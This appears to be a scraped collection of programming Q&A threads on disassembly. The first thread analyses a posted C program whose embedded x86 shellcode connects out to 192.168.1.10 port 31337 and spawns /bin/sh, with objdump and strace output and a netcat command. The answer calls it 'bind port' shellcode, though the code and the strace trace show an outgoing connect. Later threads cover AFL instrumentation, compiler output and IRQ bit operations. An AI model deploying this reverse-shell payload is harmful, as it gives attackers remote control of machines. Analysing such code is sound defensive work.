What does this shellcode mean? - c

I've found an interesting code and run it, and I wonder what this code does.
I'm worried if this code harms my computer
#include <stdio.h>
/*
ipaddr 192.168.1.10 (c0a8010a)
port 31337 (7a69)
*/
#define IPADDR "\xc0\xa8\x01\x0a"
#define PORT "\x7a\x69"
unsigned char code[] =
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2"
"\xb0\x66\xb3\x01\x51\x6a\x06\x6a"
"\x01\x6a\x02\x89\xe1\xcd\x80\x89"
"\xc6\xb0\x66\x31\xdb\xb3\x02\x68"
IPADDR"\x66\x68"PORT"\x66\x53\xfe"
"\xc3\x89\xe1\x6a\x10\x51\x56\x89"
"\xe1\xcd\x80\x31\xc9\xb1\x03\xfe"
"\xc9\xb0\x3f\xcd\x80\x75\xf8\x31"
"\xc0\x52\x68\x6e\x2f\x73\x68\x68"
"\x2f\x2f\x62\x69\x89\xe3\x52\x53"
"\x89\xe1\x52\x89\xe2\xb0\x0b\xcd"
"\x80";
main()
{
printf("Shellcode Length: %d\n", sizeof(code)-1);
int (*ret)() = (int(*)())code;
ret();
}
I don't know about shellcode

First, you should disassemble the code, for example by modifying the source to
#include <stdio.h>
/*
ipaddr 192.168.1.10 (c0a8010a)
port 31337 (7a69)
*/
#define IPADDR "\xc0\xa8\x01\x0a"
#define PORT "\x7a\x69"
unsigned char code[] =
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2"
"\xb0\x66\xb3\x01\x51\x6a\x06\x6a"
"\x01\x6a\x02\x89\xe1\xcd\x80\x89"
"\xc6\xb0\x66\x31\xdb\xb3\x02\x68"
IPADDR"\x66\x68"PORT"\x66\x53\xfe"
"\xc3\x89\xe1\x6a\x10\x51\x56\x89"
"\xe1\xcd\x80\x31\xc9\xb1\x03\xfe"
"\xc9\xb0\x3f\xcd\x80\x75\xf8\x31"
"\xc0\x52\x68\x6e\x2f\x73\x68\x68"
"\x2f\x2f\x62\x69\x89\xe3\x52\x53"
"\x89\xe1\x52\x89\xe2\xb0\x0b\xcd"
"\x80";
main()
{
write(1, code, sizeof(code)-1);
}
$ gcc -O2 sc.c -o sc
$ ./sc > sc.bin
Now, you can use objdump to get the disassembled source (isa is obviously ia32):
$ objdump -bbinary -mi386 -D sc.bin
Disassembly of section .data:
00000000 <.data>:
0: 31 c0 xor %eax,%eax
2: 31 db xor %ebx,%ebx
4: 31 c9 xor %ecx,%ecx
6: 31 d2 xor %edx,%edx
8: b0 66 mov $0x66,%al
a: b3 01 mov $0x1,%bl
c: 51 push %ecx
d: 6a 06 push $0x6
f: 6a 01 push $0x1
11: 6a 02 push $0x2
13: 89 e1 mov %esp,%ecx
15: cd 80 int $0x80
17: 89 c6 mov %eax,%esi
19: b0 66 mov $0x66,%al
1b: 31 db xor %ebx,%ebx
1d: b3 02 mov $0x2,%bl
1f: 68 c0 a8 01 0a push $0xa01a8c0
24: 66 68 7a 69 pushw $0x697a
28: 66 53 push %bx
2a: fe c3 inc %bl
2c: 89 e1 mov %esp,%ecx
2e: 6a 10 push $0x10
30: 51 push %ecx
31: 56 push %esi
32: 89 e1 mov %esp,%ecx
34: cd 80 int $0x80
36: 31 c9 xor %ecx,%ecx
38: b1 03 mov $0x3,%cl
3a: fe c9 dec %cl
3c: b0 3f mov $0x3f,%al
3e: cd 80 int $0x80
40: 75 f8 jne 0x3a
42: 31 c0 xor %eax,%eax
44: 52 push %edx
45: 68 6e 2f 73 68 push $0x68732f6e
4a: 68 2f 2f 62 69 push $0x69622f2f
4f: 89 e3 mov %esp,%ebx
51: 52 push %edx
52: 53 push %ebx
53: 89 e1 mov %esp,%ecx
55: 52 push %edx
56: 89 e2 mov %esp,%edx
58: b0 0b mov $0xb,%al
5a: cd 80 int $0x80
Now you can start disassembling. Most important are the syscalls (int $0x80); the syscall numbers are in register %eax (you can see, which syscall it is, in the includefile asm/unistd_32.h), the parameters are in other registers.
The more dangerous (and less reliable), but easier and faster way:
You can create some kind of sandbox (for example, a chrooted, unprivileged user on a unix system, or even better, a vm) and run the code with "strace" to get an idea, what it does. However, this might be less reliable, since you cannot know for sure, if you see a relevant codepath then due to the circumstances or anti-debugging techniques.

This shellcode is bind port shellcode through this address 192.168.1.10. This is commonly used for remote exploit
write(1, "Shellcode Length: 92\n", 21Shellcode Length: 92
) = 21
socket(PF_INET, SOCK_STREAM, IPPROTO_TCP) = 3
connect(3, {sa_family=AF_INET, sin_port=htons(31337), sin_addr=inet_addr("192.168.1.10")}, 16
In other terminal, if correct you can use command like nc 192.168.1.10 31337
Of course if you aware with this shellcode, you can do static analysis (like disassemble) every bytes of shellcode.

Related

AFL-GCC compiles differently than GCC

I want to understand AFL's code instrumentation in detail.
Compiling a sample program sample.c
int main(int argc, char **argv) {
int ret = 0;
if(argc > 1) {
ret = 7;
} else {
ret = 12;
}
return ret;
}
with gcc -c -o obj/sample-gcc.o src/sample.c and afl-gcc -c -o obj/sample-afl-gcc.o src/sample.c and disassembling both with objdump -d leads to different Assembly code:
[GCC]
0000000000000000 <main>:
0: f3 0f 1e fa endbr64
4: 55 push %rbp
5: 48 89 e5 mov %rsp,%rbp
8: 89 7d ec mov %edi,-0x14(%rbp)
b: 48 89 75 e0 mov %rsi,-0x20(%rbp)
f: c7 45 fc 00 00 00 00 movl $0x0,-0x4(%rbp)
16: 83 7d ec 01 cmpl $0x1,-0x14(%rbp)
1a: 7e 09 jle 25 <main+0x25>
1c: c7 45 fc 07 00 00 00 movl $0x7,-0x4(%rbp)
23: eb 07 jmp 2c <main+0x2c>
25: c7 45 fc 0c 00 00 00 movl $0xc,-0x4(%rbp)
2c: 8b 45 fc mov -0x4(%rbp),%eax
2f: 5d pop %rbp
30: c3 retq
[AFL-GCC]
0000000000000000 <main>:
0: 48 8d a4 24 68 ff ff lea -0x98(%rsp),%rsp
7: ff
8: 48 89 14 24 mov %rdx,(%rsp)
c: 48 89 4c 24 08 mov %rcx,0x8(%rsp)
11: 48 89 44 24 10 mov %rax,0x10(%rsp)
16: 48 c7 c1 0e ff 00 00 mov $0xff0e,%rcx
1d: e8 00 00 00 00 callq 22 <main+0x22>
22: 48 8b 44 24 10 mov 0x10(%rsp),%rax
27: 48 8b 4c 24 08 mov 0x8(%rsp),%rcx
2c: 48 8b 14 24 mov (%rsp),%rdx
30: 48 8d a4 24 98 00 00 lea 0x98(%rsp),%rsp
37: 00
38: f3 0f 1e fa endbr64
3c: 31 c0 xor %eax,%eax
3e: 83 ff 01 cmp $0x1,%edi
41: 0f 9e c0 setle %al
44: 8d 44 80 07 lea 0x7(%rax,%rax,4),%eax
48: c3 retq
AFL (usually) adds a trampoline in front of every basic block to track executed paths [https://github.com/mirrorer/afl/blob/master/afl-as.h#L130]
-> Instruction 0x00 lea until 0x30 lea
AFL (usually) adds a main payload to the program (which I excluded due to simplicity) [https://github.com/mirrorer/afl/blob/master/afl-as.h#L381]
AFL claims to use a wrapper for GCC, so I expected everything else to be equal. Why is the if-else-condition still compiled differently?
Bonus question: If a binary without source code available should be instrumented manually without using AFL's QEMU-mode or Unicorn-mode, can this be achieved by (naively) adding the main payload and each trampoline manually to the binary file or are there better approaches?
Re: Why the compilation with gcc and with afl-gcc is different, a short look at the afl-gcc source shows that by default it modifies the compiler parameters, setting -O3 -funroll-loops (as well as defining __AFL_COMPILER and FUZZING_BUILD_MODE_UNSAFE_FOR_PRODUCTION).
According to the documentation (docs/env_variables.txt):
By default, the wrapper appends -O3 to optimize builds. Very rarely,
this will cause problems in programs built with -Werror, simply
because -O3 enables more thorough code analysis and can spew out
additional warnings. To disable optimizations, set AFL_DONT_OPTIMIZE.

Declare variable first or directly, is there a difference?

Is there a difference between declaring a variable first and then assigning a value or directly declaring and assigning a value in the compiled function? Does the compiled function do the same work? e.g, does it still read the parameters, declare variables and then assign value or is there a difference between the two examples in the compiled versions?
example:
void foo(u32 value) {
u32 extvalue = NULL;
extvalue = value;
}
compared with
void foo(u32 value) {
u32 extvalue = value;
}
I am under the impression that there is no difference between those two functions if you look at the compiled code, e.g they will look the same and i will not be able to tell which is which.
it depends on the compiler & the optimization level of course.
A dumb compiler/low optimization level when it sees:
u32 extvalue = NULL;
extvalue = value;
could set to NULL then to value in the next line.
Since extvalue isn't used in-between, the NULL initialization is useless and most compilers directly set to value as an easy optimization
Note that declaring a variable isn't really an instruction per se. The compiler just allocates auto memory to store this variable.
I've tested a simple code with and without assignment and the result is diff
erent when using gcc compiler 6.2.1 with -O0 (don't optimize anything) flag:
#include <stdio.h>
void foo(int value) {
int extvalue = 0;
extvalue = value;
printf("%d",extvalue);
}
disassembled:
Disassembly of section .text:
00000000 <_foo>:
0: 55 push %ebp
1: 89 e5 mov %esp,%ebp
3: 83 ec 28 sub $0x28,%esp
6: c7 45 f4 00 00 00 00 movl $0x0,-0xc(%ebp) <=== here we see the init
d: 8b 45 08 mov 0x8(%ebp),%eax
10: 89 45 f4 mov %eax,-0xc(%ebp)
13: 8b 45 f4 mov -0xc(%ebp),%eax
16: 89 44 24 04 mov %eax,0x4(%esp)
1a: c7 04 24 00 00 00 00 movl $0x0,(%esp)
21: e8 00 00 00 00 call 26 <_foo+0x26>
26: c9 leave
27: c3 ret
now:
void foo(int value) {
int extvalue;
extvalue = value;
printf("%d",extvalue);
}
disassembled:
Disassembly of section .text:
00000000 <_foo>:
0: 55 push %ebp
1: 89 e5 mov %esp,%ebp
3: 83 ec 28 sub $0x28,%esp
6: 8b 45 08 mov 0x8(%ebp),%eax
9: 89 45 f4 mov %eax,-0xc(%ebp)
c: 8b 45 f4 mov -0xc(%ebp),%eax
f: 89 44 24 04 mov %eax,0x4(%esp)
13: c7 04 24 00 00 00 00 movl $0x0,(%esp)
1a: e8 00 00 00 00 call 1f <_foo+0x1f>
1f: c9 leave
20: c3 ret
21: 90 nop
22: 90 nop
23: 90 nop
the 0 init has disappeared. The compiler didn't optimize the initialization in that case.
If I switch to -O2 (good optimization level) the code is then identical in both cases, compiler found that the initialization wasn't necessary (still, silent, no warnings):
0: 55 push %ebp
1: 89 e5 mov %esp,%ebp
3: 83 ec 18 sub $0x18,%esp
6: 8b 45 08 mov 0x8(%ebp),%eax
9: c7 04 24 00 00 00 00 movl $0x0,(%esp)
10: 89 44 24 04 mov %eax,0x4(%esp)
14: e8 00 00 00 00 call 19 <_foo+0x19>
19: c9 leave
1a: c3 ret
I tried these functions in godbolt:
void foo(uint32_t value)
{
uint32_t extvalue = NULL;
extvalue = value;
}
void bar(uint32_t value)
{
uint32_t extvalue = value;
}
I ported to the actual type uint32_t rather than u32 which is not standard. The resulting non-optimized assembly generated by x86-64 GCC 6.3 is:
foo(unsigned int):
push rbp
mov rbp, rsp
mov DWORD PTR [rbp-20], edi
mov DWORD PTR [rbp-4], 0
mov eax, DWORD PTR [rbp-20]
mov DWORD PTR [rbp-4], eax
nop
pop rbp
ret
bar(unsigned int):
push rbp
mov rbp, rsp
mov DWORD PTR [rbp-20], edi
mov eax, DWORD PTR [rbp-20]
mov DWORD PTR [rbp-4], eax
nop
pop rbp
ret
So clearly the non-optimized code retains the (weird, as pointed out by others since it's not written to a pointer) NULL assignment, which is of course pointless.
I'd vote for the second one since it's shorter (less to hold in one's head when reading the code), and never allow/recommend the pointless setting to NULL before overwriting with the proper value. I would consider that a bug, since you're saying/doing something you don't mean.

Meaning of DISP32 in objdump output

I'm trying to understand how string literals in C get translated into assembly.
I have a very simple C program:
int main() {
char* c = "test";
}
Creating the object file (gcc -c test.c) and disassembling it via objdump (gobjdump -SrxD test.o) yields the following:
0000000000000000 <_main>:
0: 55 push %rbp
1: 48 89 e5 mov %rsp,%rbp
4: 31 c0 xor %eax,%eax
6: 48 8d 0d 00 00 00 00 lea 0x0(%rip),%rcx # d <_main+0xd>
9: DISP32 L_.str
d: 48 89 4d f8 mov %rcx,-0x8(%rbp)
11: 5d pop %rbp
12: c3 retq
0000000000000013 <L_.str>:
13: 74 65 je 7a <L_.str+0x67>
15: 73 74 jae 8b <L_.str+0x78>
In the disassembled output it's unclear what 9: DISP32 L_.str means. I also noticed that the corresponding machine code is missing. What exactly is this line doing?

Is it possible to interrupt evaluation of an expression

Consider the following piece of code.
#‎include‬ <stdio.h>
void f(int *x, int *y)
{
(*x)++;
(*y)++;
}
int main()
{
int x=5, y=5;
f(&x, &y);
return 0;
}
I know that the function f is not reentrant. One of the stupid things I am thinking is to do (*x)++ + (*y)++ in one line and discard the sum. I wonder that multiple assembly instructions will be generated for evaluation of this expression. Will the interrupt be served in between evaluation of expression?
You won't get anything atomic with that...
c.o: file format elf64-x86-64
Disassembly of section .text:
0000000000000000 <f>:
0: 55 push %rbp
1: 48 89 e5 mov %rsp,%rbp
4: 48 89 7d f8 mov %rdi,-0x8(%rbp)
8: 48 89 75 f0 mov %rsi,-0x10(%rbp)
c: 48 8b 45 f8 mov -0x8(%rbp),%rax
10: 8b 00 mov (%rax),%eax
12: 8d 50 01 lea 0x1(%rax),%edx
15: 48 8b 45 f8 mov -0x8(%rbp),%rax
19: 89 10 mov %edx,(%rax)
1b: 48 8b 45 f0 mov -0x10(%rbp),%rax
1f: 8b 00 mov (%rax),%eax
21: 8d 50 01 lea 0x1(%rax),%edx
24: 48 8b 45 f0 mov -0x10(%rbp),%rax
28: 89 10 mov %edx,(%rax)
2a: 5d pop %rbp
2b: c3 retq
And it gets a lot better with -O2, but still it's not atomic.
c.o: file format elf64-x86-64
Disassembly of section .text:
0000000000000000 <f>:
0: 83 07 01 addl $0x1,(%rdi)
3: 83 06 01 addl $0x1,(%rsi)
6: c3 retq
And, at least for GCC, the exact same code is generated for (*x)++ + (*y++). Anyway, may you elaborate a little bit on your question? You're being too broad and this code is reentrant as long as x and y are not the same on different entries. Otherwise, you should give us more details about you're intending.
Edit: It's (apparently, unless there's some hidden black magic...) impossible to do such a thing atomically on a x86(-64) architecture. Anyway, it's non-portable to consider an operation "atomic" if it is done in a single instruction. That's specific to x86(-64) CPUs.

analyzing i386 assembled function... line by line

hi i'm such newb in assemble and OS world. and yes this is my homework which i'm in stuck in deep dark of i386 manual. please help me or give me some hint.. here's code i have to analyze ine by line. this function is part of EOS(educational OS), doing about interrupt request in hal(hardware abstraction layer). i did "objdump -d interrupt.o" and got this assemble code. of course in i386.
00000000 <eos_ack_irq>:
0: 55 push %ebp ; push %ebp to stack to save stack before
1: b8 fe ff ff ff mov $0xfffffffe,%eax ; what is this??
6: 89 e5 mov %esp,%ebp ; couple with "push %ebp". known as prolog assembly function.
8: 8b 4d 08 mov 0x8(%ebp),%ecx ; set %ecx as value of (%ebp+8)...and what is this do??
b: 5d pop %ebp ; pop the top of stack to %ebp. i know this is for getting back to callee..
c: d3 c0 rol %cl,%eax ; ????? what is this for???
e: 21 05 00 00 00 00 and %eax,0x0 ; make %eax as 0. for what??
14: c3 ret ; return what register??
00000015 <eos_get_irq>:
15: 8b 15 00 00 00 00 mov 0x0,%edx
1b: b8 1f 00 00 00 mov $0x1f,%eax
20: 55 push %ebp
21: 89 e5 mov %esp,%ebp
23: 56 push %esi
24: 53 push %ebx
25: bb 01 00 00 00 mov $0x1,%ebx
2a: 89 de mov %ebx,%esi
2c: 88 c1 mov %al,%cl
2e: d3 e6 shl %cl,%esi
30: 85 d6 test %edx,%esi
32: 75 06 jne 3a <eos_get_irq+0x25>
34: 48 dec %eax
35: 83 f8 ff cmp $0xffffffff,%eax
38: 75 f0 jne 2a <eos_get_irq+0x15>
3a: 5b pop %ebx
3b: 5e pop %esi
3c: 5d pop %ebp
3d: c3 ret
0000003e <eos_disable_irq_line>:
3e: 55 push %ebp
3f: b8 01 00 00 00 mov $0x1,%eax
44: 89 e5 mov %esp,%ebp
46: 8b 4d 08 mov 0x8(%ebp),%ecx
49: 5d pop %ebp
4a: d3 e0 shl %cl,%eax
4c: 09 05 00 00 00 00 or %eax,0x0
52: c3 ret
00000053 <eos_enable_irq_line>:
53: 55 push %ebp
54: b8 fe ff ff ff mov $0xfffffffe,%eax
59: 89 e5 mov %esp,%ebp
5b: 8b 4d 08 mov 0x8(%ebp),%ecx
5e: 5d pop %ebp
5f: d3 c0 rol %cl,%eax
61: 21 05 00 00 00 00 and %eax,0x0
67: c3 ret
and here's pre-assembled C code
/* ack the specified irq */
void eos_ack_irq(int32u_t irq) {
/* clear the corresponding bit in _irq_pending register */
_irq_pending &= ~(0x1<<irq);
}
/* get the irq number */
int32s_t eos_get_irq() {
/* get the highest bit position in the _irq_pending register */
int i = 31;
for(; i>=0; i--) {
if (_irq_pending & (0x1<<i)) {
return i;
}
}
return -1;
}
/* mask an irq */
void eos_disable_irq_line(int32u_t irq) {
/* turn on the corresponding bit */
_irq_mask |= (0x1<<irq);
}
/* unmask an irq */
void eos_enable_irq_line(int32u_t irq) {
/* turn off the corresponding bit */
_irq_mask &= ~(0x1<<irq);
}
so these functions do ack and get and mask and unmask an interrupt request. and i'm stuck at the first one. so if you are mercy enough, would you please get me some hint or answer to analyze the first function? i'll try to get the others... and i'm very sorry for another homework.. (my TA doesn't look email)
21 05 00 00 00 00 (that and) is actually an and with a memory operand (namely and [0], eax) which the AT&T syntax obscures (but technically it does say that, note the absence of a $ sign). It makes more sense that way (the offset of 0 suggests you didn't link the code before disassembling).
mov $0xfffffffe, %eax is doing exactly what it looks like it's doing (note that 0xfffffffe is all ones except the lowest bit), and that means the function has been implemented like this:
_irq_pending &= rotate_left(0xFFFFFFFE, irq);
Saving a not operation. It has to be a rotate there instead of a shift in order to make the low bits 1 if necessary.

Resources